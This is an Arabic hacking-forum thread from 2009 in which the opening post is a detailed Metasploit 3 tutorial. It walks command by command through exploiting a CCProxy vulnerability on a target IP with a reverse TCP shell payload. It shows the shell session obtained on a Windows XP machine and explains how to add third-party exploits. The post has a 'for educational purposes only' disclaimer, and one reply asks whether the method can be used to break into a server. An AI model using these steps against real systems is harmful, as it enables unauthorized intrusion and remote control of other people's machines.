التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام


قديم 08-11-2009, 06:39 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
إحصائية العضو








Italiano Algerino Hacker غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Italiano Algerino Hacker is on a distinguished road

................ استخدام مشروع Metasploit و شرح استغلال ثغراته بالتفصيل


بدأ مشروع ثغرات Metasploit في عام 2003 تقريبا و منذ ذلك الوقت حتى يومنا هذا شهد المشروع تطوّرات عديدة و ملحوظة خصوصا بعد اطلاق الاصدار 3.0 في بداية سنة 2008, يحتوي مشروع Metasploit على عدد كبير من ثغرات الأنظمة و البرامج الجاهزة للاستغلال بالاضافة للعديد من الأدوات التي تساعدنا على اكتشاف ثغرات Buffer overflow و فحص الأنظمة و الشبكات أضف الى ذلك احتوائه على قاعدة بيانات Shellcode و Opcode تساعد مكتشفي الثغرات على برمجة و كتابة استغلالاتهم بكل سهولة. و في كل اصدار جديد يضاف الى المشروع ثغرات و أدوات جديدة تجعل من ميتاسبلويت واحدا من أقوى و أسهل مشاريع الثغرات الموجودة في وقتنا هذا…


لكل شيء محاسن و مساوء قوة مشروع ميتاسبلويت و سهولة استخدامه جعلت الكثيرين من الأطفال الذين يظنون أنفسهم Hackers يستخدمه لاختراق أجهزة الآخرين و التحكم بها بتنفيذ بضعة أوامر دون أي معرفة أو فهم بالثغرة, سببها, برمجتها أو حتى كيفية استغلالها و بصراحة ترددت كثيرا عند كتابة هذا الموضوع لأن الاختراق باستخدام مشروع ميتاسبلويت سهل جدا و احترافي لدرجة أننا قد نتمكن من اختراق جميع الأجهزة الموجودة معنا على الشبكة بسهولة و بتطبيق عدة أوامر فقط! و قبل أن أبدأ يجب معرفة أن الشرح للغرض العلمي فقط! و أنا لا أشجع أحد على تجربة ما ذكر هنا خارج نطاق شبكته الخاصة أو بدون اذن مسبق من مدير الشبكة و رغم محاولتي لتفصيل أغلب الخطوات المذكوره في الشرح الا أنه ليس موجه للمبتدئين أو للأشخاص الذين لا يملكون معرفة مسبقة بهذه الأمور و لن يتم التطرق لكيفية تنصيب المشروع على الجهاز فهذه الأشياء يجب أن تكون من البديهيات, سأستخدم سطر الأوامر بشكل أساسي و التطبيق سيكون على نظام Linux توزيعة BackTrack 3 على الاصدار 3.2 من مشروع ميتاسبلويت مع العلم من الممكن تطبيق بعض ما ذكر هنا على نظام ويندوز لكني لا أنصح بذلك!

نبدأ بفتح سطر الأوامر و من ثم الذهاب للمجلد الموجود به مشروع Metasploit في توزيعة BackTrack 3 سيكون المشروع في المسار التالي:

/pentest/exploits/framework3/

بعد ذلك نقوم بتشغيل سطر أوامر مشروع Metasploit بتنفيذ الأمر:

./msfconsole

[IMG]http://br4v3-h34r7.com/wp-*******/uploads/2008/08/metasploit-1.png[/IMG]

أول ما يبدأ سطر أوامر Metasploit يعطينا معلومات عن حالة المشروع مثل الاصدار, عدد الثغرات الموجودة, عدد الأدوات و الـ Payloads و غيرها من الأمور الأخرى مايهمنها حاليا الثغرات فقط و هذا ما سأشرحه هنا. لنتمكن من استغلال ثغرة Metasploit هنالك بضعة خطوات يجب القيام بها, تختلف هذه الخطوات و الخيارات من ثغرة لأخرى الا أنها متشابهة بشكل عام. أول شيء علينا تحديد الثغرة التي نريد استغلالها بعد ذلك نحدد الخيارات الخاصة بها مثل الاصدار المصاب, نظام التشغيل, الاستغلال… ثم ننفذ الثغرة و نستخدمها حسب الاستغلال المحدد في الخيارات, يوجد الكثير من الأوامر التي يمكننا استخدامها في مشروع ميتاسبلويت لمعرفتها نقوم بتنفيذ الأمر التالي:

msf > help

[IMG]http://br4v3-h34r7.com/wp-*******/uploads/2008/08/metasploit-2.png[/IMG]


ما يهمنا حاليا في استغلال الثغرات هي الأوامر المظللة في الصورة

msf > show exploits
msf > info exploit
msf > use exploit

نستخدم الأمر الأول لاظهار الثغرات الموجودة في المشروع أما الثاني لاظهار معلومات مفصلة عن الثغرة و مصادر خارجية عنها و الثالث لاستخدام الثغرة و تحديد خياراتها, أول شيء ننفذ الأمر الأول لاستعراض الثغرات الموجودة في المشروع

msf > show exploits

[IMG]http://br4v3-h34r7.com/wp-*******/uploads/2008/08/metasploit-3.png[/IMG]


كما هو واضح تم اظهار عدد كبير من الثغرات و بجانب كل ثغرة معلومات بسيطة عن البرنامج/النظام و الاصدار المصاب و لاظهار معلومات مفصلة عن احدى الثغرات يكفي تنفيذ الأمر info , مثال على ذلك:

msf > info windows/proxy/ccproxy_telnet_ping

بعد تنفيذ الأمر السابق سيتم اظهار كافة المعلومات المتوفرة عن الثغرة الموجودة في برنامج CCProxy الاصدار 6.2 كما هو واضح في الصورة التالية:

[IMG]http://br4v3-h34r7.com/wp-*******/uploads/2008/08/metasploit-4.png[/IMG]

قبل البدء باستخدام الثغرة نلاحظ الخيارات المتوفرة لها و كما قلت سابقا تختلف الخيارات من ثغرة لأخرى لكن في هذه الثغرة يوجد لدينا خيارين أساسيين الأول هو IP السيرفر الذي يستعمل برنامج CCProxy أما الثاني فهو المنفذ الذي يستخدمه البرنامج, أيضا لا ننسى تحديد النظام فهذا شيء مهم في ثغرات Metasploit خصوصا أنظمة Windows و اصداراتها و علينا معرفة أن استغلال هذه النوعية من الثغرات دقيق جدا و صعوبة استغلالها تكمن في دقتها فأي خيار خاطئ نحدده لن يمكننا من استغلال الثغرة بشكل صحيح, الأن ننفذ الأمر use لنستخدم الثغرة

msf > use windows/proxy/ccproxy_telnet_ping

و نستخدم الأمر show لاظهار خيارات الثغرة المتوفرة

msf exploit(ccproxy_telnet_ping) > show options

نحدد الخيارات التي تناسبنا باستخدام الأمر set كما هو واضح من الصورة التالية:

[IMG]http://br4v3-h34r7.com/wp-*******/uploads/2008/08/metasploit-5.png[/IMG]

أول شيء أظهرنا خيارات الثغرة باستخدام الأمر السابق ثم حددنا الخيار RHOST وهو IP الجهاز المستهدف و ذلك باستخدام الأمر:

msf exploit(ccproxy_telnet_ping) > set RHOST 192.168.0.53

بالنسبة لي كان 192.168.0.53 و أبقيت الخيار RPORT نفسه 23 و هو المنفذ الذي يستخدمه برنامج CCProxy بشكل افتراضي و طبعا يمكن تغييره بحسب المنفذ المستخدم مثلا 34 باستخدام الأمر:

msf exploit(ccproxy_telnet_ping) > set RPORT 34

بعد ذلك نقوم باظهار الأنظمة المتاحة باستخدام الأمر:

msf exploit(ccproxy_telnet_ping) > show targets

نحدد الخيار 4 و هو نظام Windows XP SP2 - English بتنفيذ:

msf exploit(ccproxy_telnet_ping) > set TARGET 4

[IMG]http://br4v3-h34r7.com/wp-*******/uploads/2008/08/metasploit-6.png[/IMG]

أما الآن نظهر الاستغلالات المتاحة لهذه الثغرة باستخدام الأمر:

msf exploit(ccproxy_telnet_ping) > show payloads

بالنسبة لي سأحدد الاستغلال windows/shell_reverse_tcp و يستخدم هذا الاستغلال لانشاء اتصال عكسي مع الجهاز الذي تم تنفيذ الثغرة عليه و نتحكم بالاتصالات من داخل مشروع ميتاسبلويت

msf exploit(ccproxy_telnet_ping) > set PAYLOAD windows/shell_reverse_tcp

[IMG]http://br4v3-h34r7.com/wp-*******/uploads/2008/08/metasploit-7.png[/IMG]


مع العلم من امكانية تحديد أي استغلال آخر نريد مثل تنفيذ أمر محدد على النظام, فتح منفذ و الاتصال به عن طريق أداة الـ Netcat, تحميل ملف و تشغيله أو حتى اضافة مستخدم جديد للنظام بصلاحيات Administrator, الأن ننفذ الأمر:

msf exploit(ccproxy_telnet_ping) > show options

من جديد لمراجعة الخيارات المخصصة للثغرة أو لتعديل أي خيار مثل ما هو واضح بالصورة التالية:

[IMG]http://br4v3-h34r7.com/wp-*******/uploads/2008/08/metasploit-8.png[/IMG]


يمكننا الأن تحديد خيارات الاستغلال مثل LHOST وهو IP جهازنا و LPORT هو المنفذ الذي سيتم الاتصال العكسي عن طريقه بتنفيذ الأمر:

msf exploit(ccproxy_telnet_ping) > set LHOST 192.168.0.41

بالنسبة لي سأترك المنفذ 4444 نفسه دون تغيير, الأن لم يبقى علينا الا تطبيق الأمر

msf exploit(ccproxy_telnet_ping) > exploit

لتنفيذ الثغرة و اذا كانت جميع الخيارات صحيحة سيتم تنفيذ الاستغلال و لنتمكن من مشاهدة الاتصالات العكسية الموجودة ننفذ الأمر:

msf > sessions -l

Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Command shell 192.168.0.41:23443 -> 192.168.0.53:1032

و من ثم ننفذ الأمر التالي للاتصال باحدى الاتصالات المتاحة و في هذه الحالة هو رقم 1

msf > sessions -i 1
[*] Starting interaction with 1...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:WINDOWSsystem32>

مع العلم من امكانية تنفيذ أكثر من استغلال على أكثر من جهاز و الحصول على اتصالات أخرى.. أو القيام بهذه العملية بشكل أوتوماتيكي باستخدام احدى أدوات ميتاسبلويت الخطيرة و هي db_autopwn التي سأترك شرحها لموضوع آخر و طبعا يوجد الكثير من الاستغلالت الأخرى أترك تجربتها لكم.

كل ما ذكر سابقا مجرد مثال بسيط عن احدى ثغرات الميتاسبلويت لكن المشروع أقوى من ذلك بكثير و يوجد له استخدمات و ثغرات أخرى قوية قد أشرحها قريبا ان شاء الله, كل ماعليك الأن هو التجربة و اعادة المحاولة و لا تتوقع أن تتمكن من استغلال الثغرة من أول مرة أو ثاني مرة و لا حتى بعد 10 مرات كل مرة تجرب بها ثغرة ستكشف شيء جديد و خطأ قمت به و تذكر أن الدقة أهم شيء في استغلال ثغرات مشروع الميتاسبلويت فتحديد البرنامج و الاصدار المصاب أصعب من استغلال الثغرة المكتوبة له. من الجميل أيضا في مشروع ميتاسبلويت هو وجود واجهات رسومية جميلة لتسهيل التعامل مع المشروع و مخصصة للأشخاص الذين لايحبون استخدام سطر الأوامر

[IMG]http://br4v3-h34r7.com/wp-*******/uploads/2008/08/metasploit-9.png[/IMG]

الواجهة الرسومية العادية GUI لتشغيلها ننفذ الأمر التالي داخل مجلد مشروع Metasploit

./msfgui

[IMG]http://br4v3-h34r7.com/wp-*******/uploads/2008/08/metasploit-10.png[/IMG]

الواجهة التي تعمل من المتصفح لتشغيلها ننفذ الأمر التالي داخل مجلد المشروع

./msfweb

بعد ذلك نفتح المتصفح على الرابط

http://127.0.0.1:55555

ماذا بعد؟ لنفرض الآن أننا نريد استغلال ثغرة غير موجودة في مشروع الميتاسبلويت أحضرناها من موقع Milw0rm مثلا كيف سنضيفها؟ بصراحة وجدت الكثيرين لا يعرفون الطريقة رغم بساطتها و طبعا الشرح للينوكس و نصيحة للجميع ابتعدوا عن ويندوز في هذه الأمور, كما نعرف في الاصدار 2 السابق من مشروع Metasploit كان المشروع و ثغراته تبرمج بلغة Perl و تأتي بالامتداد pm أما في الاصدار 3 تم اعادة برمجة المشروع من جديد بلغة Ruby و تأتي الثغرة بالامتداد rb لذلك أول شيء علينا معرفة نوعية الثغرة هل هي للاصدار 3.0 أم لاصدارات سابقة 2.0 ؟ أتوقع أن الاختلاف بين الكود البرمجي بين اللغتين واضح جدا (مثال عن ثغرة للاصدار 2 - مثال عن ثغرة للاصدار 3) طبعا الشرح هنا موجه للاصدار 3.0 فهذا مانتكلم عنه في هذا الموضوع, اذا اطلعنا على كود الثغرة و ركزنا على السطر التالي:

class Exploits::Windows:: Driver::Intel_Centrino_2200BG_driver_probe < Msf::Exploit::Remote

سنعرف أن الثغرة لنظام Windows مصنفة في Driver اسمها Intel_Centrino_2200BG_driver_probe الأن كل ماعلينا هو التوجه للمجلد الموجود في المسار التالي:

/home/USER/.msf3/

طبعا مع استبدال USER باسم المستخدم عندك في نظام لينوكس و اذا لم يكن المجلد موجود يمكننا انشاؤه ببساطة! أما اذا كنت تعمل بالمستخدم root كما في توزيعة BackTrack سيكون مسار المجلد:

/root/.msf3

بعد الدخول للمجلد ننشئ مجلد جديد باسم modules بداخله مجلد آخر باسم exploits ليصبح المسار النهائي بهذا الشكل:

/home/USER/.msf3/modules/exploits

الأن ننشئ بداخل مجلد exploits مجلد باسم windows بداخله مجلد driver بعد ذلك ندخل للمجلد driver و ننشئ ملف الثغرة باسم Intel_Centrino_2200BG_driver_probe متبوعا بالامتداد .rb و بداخله كود الثغرة كامل ليصبح مسار الثغرة النهائي:

/home/USER/.msf3/modules/exploits/windows/driver/Intel_Centrino_2200BG_driver_probe.rb

جميل جدا الأن كل ماعلينا هو تشغيل سطر أوامر مشروع Metasploit من جديد و ملاحظة عدد الثغرات قبل و بعد تطبيق ما سبق و سنلاحظ وجود الثغرة ضمن قائمة الثغرات الموجودة في المشروع!

[IMG]http://br4v3-h34r7.com/wp-*******/uploads/2008/08/metasploit-11.png[/IMG]

أما اذا أردنا تحديث المشروع بشكل كامل و اضافة ثغرات و أدوات جديدة.. يكفي الدخول لمجلد المشروع و من ثم تطبيق الأمر التالي:

svn update

أخيرا يرجى في حال وجود أي خطأ في الشرح تنبيهي له مهما كان بسيط فالشرح طويل نوعا ما و رغم تجريب ماذكر و محاولتي لتجنب الوقع بأي خطأ فقد أسهو أحيانا, أتمنى أن يكون الموضوع قد نال اعجابكم و يرجى عدم نقل الموضوع دون الاشارة برابط للمصدر!

تحديث: نظرا لطلب كتاب Metasploit Toolkit for Penetration Testing Exploit Development and Vulnerability Research أكثر من مرة عن طريق التعليقات و الايميل قررت أن أضيف رابط تحميله للموضوع ليستفيد الجميع.. الكتاب يحتوي على شروحات متقدمة لاستخدامات مشروع الميتاسبلويت و برمجة ثغراته, يمكنكم تحميله من

http://www.rapidshare.com/files/1453...-h34r7.com.pdf

الحقوق للاخ عبد المهيمن br4v3-h34r7


hsjo]hl lav,u Metasploit , avp hsjyghg eyvhji fhgjtwdg

التوقيع

جــامي تـنـدم فالـدنـيــا عـلـى لـي بـاعوك و ه ♥ـجروا .... !
جـامي تـقـول أنــا عــرة . 'الـراجــل جـامي طـاح قـدرو '
و لـي رخـيـس راهـو بـاين وجـهــو يـعـطـيــك خـبروا
الـدنـيــا هـادي مـكتــوب كـل واحـد واش عـطاه زهـرو

 


التعديل الأخير تم بواسطة Italiano Algerino Hacker ; 08-20-2009 الساعة 12:43 PM.

   

رد مع اقتباس
قديم 08-11-2009, 07:45 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
إحصائية العضو







ابو بدر غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
ابو بدر is on a distinguished road

افتراضي


مشكوووووووووووور اخي على الموضوع الرائع

   

رد مع اقتباس
قديم 08-11-2009, 09:25 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية LAV4
 

 

 
إحصائية العضو







LAV4 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
LAV4 is on a distinguished road

افتراضي


شكرا لك يا اخي
الله يعطيك العافيه

التوقيع



lava my name

hacker my game

 

   

رد مع اقتباس
قديم 08-17-2009, 12:46 AM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية d4rK-h4ck3r
 

 

 
إحصائية العضو







d4rK-h4ck3r غير متواجد حالياً

إرسال رسالة عبر MSN إلى d4rK-h4ck3r

 

 

إحصائية الترشيح

عدد النقاط : 10
d4rK-h4ck3r is on a distinguished road

افتراضي


بالله عليك لا تنسى حفظ الحقوق للاخ عبد المهيمن br4v3-h34r7
الراجل تعب في كتابته وشكرا
سلام

التوقيع





DДЯk ĦДCkЄЯ
غائب لسنة كاملة بسبب الدراسة الجامعية


 

   

رد مع اقتباس
قديم 08-24-2009, 01:58 AM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
الصورة الرمزية al.3kro0ot
 

 

 
إحصائية العضو





al.3kro0ot غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
al.3kro0ot is on a distinguished road

افتراضي


الله يعطيك العافيه

التوقيع

العقلاء ثلاثة .. من ترك الدنيا قبل أن تتركه .. ومن بني قبره قبل أن يدخله .. ومن ارضي خالقه قبل أن يلقاه
اخوكم العكرووت ...
اتحادي صميم
جداااوي


 

   

رد مع اقتباس
قديم 08-26-2009, 08:08 AM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
الصورة الرمزية gaara
 

 

 
إحصائية العضو





gaara غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
gaara is on a distinguished road

افتراضي


مشكوووووووووووور اخي على الموضوع الرائع

   

رد مع اقتباس
قديم 01-25-2012, 02:04 PM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
الصورة الرمزية PirateB6
 

 

 
إحصائية العضو





PirateB6 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
PirateB6 is on a distinguished road

افتراضي رد: استخدام مشروع Metasploit و شرح استغلال ثغراته بالتفصيل


مشكور يا غالي غاية في دقة ولبساطة

   

رد مع اقتباس
قديم 04-26-2012, 07:42 PM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
الصورة الرمزية lovemachine
 

 

 
إحصائية العضو






lovemachine غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
lovemachine is on a distinguished road

افتراضي رد: استخدام مشروع Metasploit و شرح استغلال ثغراته بالتفصيل


شكرا يا باشا بجد موضوع يستاهل

التوقيع

http://www14.0zz0.com/2012/03/02/22/912721044.jpg

 

   

رد مع اقتباس
قديم 05-06-2012, 01:09 AM   رقم المشاركة : 9 (permalink)
معلومات العضو
 
الصورة الرمزية viva plus dz
 

 

 
إحصائية العضو






viva plus dz غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
viva plus dz is on a distinguished road

افتراضي رد: استخدام مشروع Metasploit و شرح استغلال ثغراته بالتفصيل


شكرا وليد لبلاد تعيش علي المعلومات

التوقيع

[COLOR="Blue"]team dz..viva plus dz


incouni@hotmail.com/COLOR]

 

   

رد مع اقتباس
قديم 05-28-2012, 07:46 PM   رقم المشاركة : 10 (permalink)
معلومات العضو
 
الصورة الرمزية abdoog
 

 

 
إحصائية العضو





abdoog غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
abdoog is on a distinguished road

افتراضي رد: استخدام مشروع Metasploit و شرح استغلال ثغراته بالتفصيل


بالله عليكم تجددو رابط تحميل الكتاب


ومشكووور عالشرح يا اخوان

التوقيع


=============================
هما طريقان


http://im29.gulfup.com/WRLb10.jpg



=============================






 

   

رد مع اقتباس
قديم 06-09-2012, 01:10 AM   رقم المشاركة : 11 (permalink)
معلومات العضو
 
إحصائية العضو






أمير غزة غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
أمير غزة is on a distinguished road

افتراضي رد: استخدام مشروع Metasploit و شرح استغلال ثغراته بالتفصيل


رااااااااااااااااااااااااااااااااااااااااااااااااا اااااااااااااااااااااااااااااااااائع
ممكن نستخدمو لاختراق سيرفر ؟

   

رد مع اقتباس
قديم 06-13-2012, 06:12 PM   رقم المشاركة : 12 (permalink)
معلومات العضو
 
الصورة الرمزية Taliban
 

 

 
إحصائية العضو







Taliban غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Taliban is on a distinguished road

افتراضي رد: استخدام مشروع Metasploit و شرح استغلال ثغراته بالتفصيل


مشكور أخي الكريم على الشرح

التوقيع

اللَّهُمَّ أَنْتَ رَبِّي ، لا إِلَه إِلاَّ أَنْتَ خَلَقْتَني وأَنَا عَبْدُكَ ، وأَنَا على عهْدِكَ ووعْدِكَ ما اسْتَطَعْتُ ، أَعُوذُ بِكَ مِنْ شَرِّ ما صنَعْتُ ، أَبوءُ لَكَ بِنِعْمتِكَ علَيَ ، وأَبُوءُ بذَنْبي فَاغْفِرْ لي ، فَإِنَّهُ لا يغْفِرُ الذُّنُوبِ إِلاَّ أَنْتَ....

 

   

رد مع اقتباس
قديم 07-18-2015, 05:34 AM   رقم المشاركة : 13 (permalink)
معلومات العضو
 
الصورة الرمزية جيكل
 

 

 
إحصائية العضو






جيكل غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
جيكل is on a distinguished road

افتراضي رد: استخدام مشروع Metasploit و شرح استغلال ثغراته بالتفصيل


مشكوووووووور

   

رد مع اقتباس
قديم 12-28-2015, 04:59 PM   رقم المشاركة : 14 (permalink)
معلومات العضو
 
الصورة الرمزية takidi
 

 

 
إحصائية العضو







takidi غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
takidi is on a distinguished road

افتراضي رد: استخدام مشروع Metasploit و شرح استغلال ثغراته بالتفصيل


اروع منتدى والله

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
استخدام مشروع Metasploit و شرح استغلال ثغراته بالتفصيل PiNki قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات 9 10-18-2011 02:00 PM
استخدام مشروع Metasploit و شرح استغلال ثغراته بالتفصيل Wolf_112 MetaSploit 14 12-16-2010 04:38 PM
استخدام مشروع Metasploit و شرح استغلال ثغراته بالتفصيل ViRuS Qalaa MetaSploit 1 07-03-2010 03:09 AM
اضافة ثغره على مشروع Metasploit Wolf_112 MetaSploit 12 07-16-2009 04:26 PM


الساعة الآن 01:30 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0